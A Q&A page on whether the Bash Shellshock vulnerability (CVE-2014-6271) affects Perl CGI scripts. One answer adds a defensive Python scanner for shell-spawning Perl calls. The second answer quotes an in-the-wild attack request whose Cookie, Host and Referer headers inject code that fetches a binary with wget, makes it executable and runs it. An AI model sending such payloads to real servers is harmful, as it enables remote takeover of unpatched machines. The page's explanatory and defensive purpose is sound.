The bash vulnerability CVE-2014-6271. Can it affe

Published 2019-04-16 02:26

Question:

Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability. I am trying to understand if it can affect my server via my Perl CGI scripts.

Can my code be affected in a malicious way - what would my code need to do to be affected? What should I check to verify this?

Answer 1:

Yes, it affects Perl if your CGI script spawns subshells, e.g., using the system() or open() functions or backticks. See this excellent Red Hat blog post. Note that the blog post is not Red Hat specific in any significant way.

Check your Perl CGI scripts for these functions, BUT FIRST UPGRADE BASH TO A FIXED VERSION!
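One way to run the check Answer 1 suggests, as an added example that is not part of the original answers: a heuristic Python scan of Perl source for constructs that can spawn a shell. The patterns, the function name and the sample script are constructed for illustration; a regex pass misses indirect cases such as a two-argument open() on a variable, so treat the hits as a review list rather than proof of safety.

```python
import re
import sys

# Heuristic patterns (assumptions, not a Perl parser) for subshell-spawning constructs.
PATTERNS = [
    ("system/exec call", re.compile(r"\b(?:system|exec)\b\s*[(\"'$@]")),
    ("qx// operator", re.compile(r"\bqx\s*[^\w\s]")),
    ("backticks", re.compile(r"`[^`]+`")),
    # open() with a literal that starts or ends with a pipe, or a '-|' / '|-' mode
    ("piped open", re.compile(r"""\bopen\b[^;]*?(["'])(?:\s*\|[^"']*|[^"'|]*\|\s*)\1""")),
]

def audit_perl_source(source, name="<script>"):
    """Return (name, line number, label) for each line that may spawn a shell."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):  # skip full-line comments and the shebang
            continue
        for label, pattern in PATTERNS:
            if pattern.search(line):
                findings.append((name, lineno, label))
    return findings

# Constructed sample CGI script, embedded so the example runs offline.
SAMPLE_CGI = r'''#!/usr/bin/perl
use strict; use warnings;
use CGI;
my $q = CGI->new;
print $q->header('text/plain');
# system("never runs, comment only");
my $host = `hostname`;
open(my $log, '>>', '/tmp/app.log') or die "cannot open log: $!";
open(my $mail, "| /usr/sbin/sendmail -t") or die "no sendmail: $!";
my $up = qx{uptime};
system("logger", "cgi hit");
'''

if __name__ == "__main__":
    # Scan the files given on the command line, or the sample if none are given.
    results = []
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            results += audit_perl_source(fh.read(), path)
    if not sys.argv[1:]:
        results = audit_perl_source(SAMPLE_CGI, "sample.cgi")
    for name, lineno, label in results:
        print(f"{name}:{lineno}: {label}")
```
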



Answer 2:

You could try to set specially crafted strings to the HTTP server as Referrer, Cookie, Host or Accept header which are then passed to (bash) CGI scripts:

    GET./.HTTP/1.0
    .User-Agent:.Thanks-Rob
    .Cookie:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
    .Host:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
    .Referer:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
    .Accept:./

See https://gist.github.com/anonymous/929d622f3b36b00c0be1 as a real world example of malware which was seen in the wild.

If your Perl scripts do not call bash (by using system or open) you should be safe.

See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/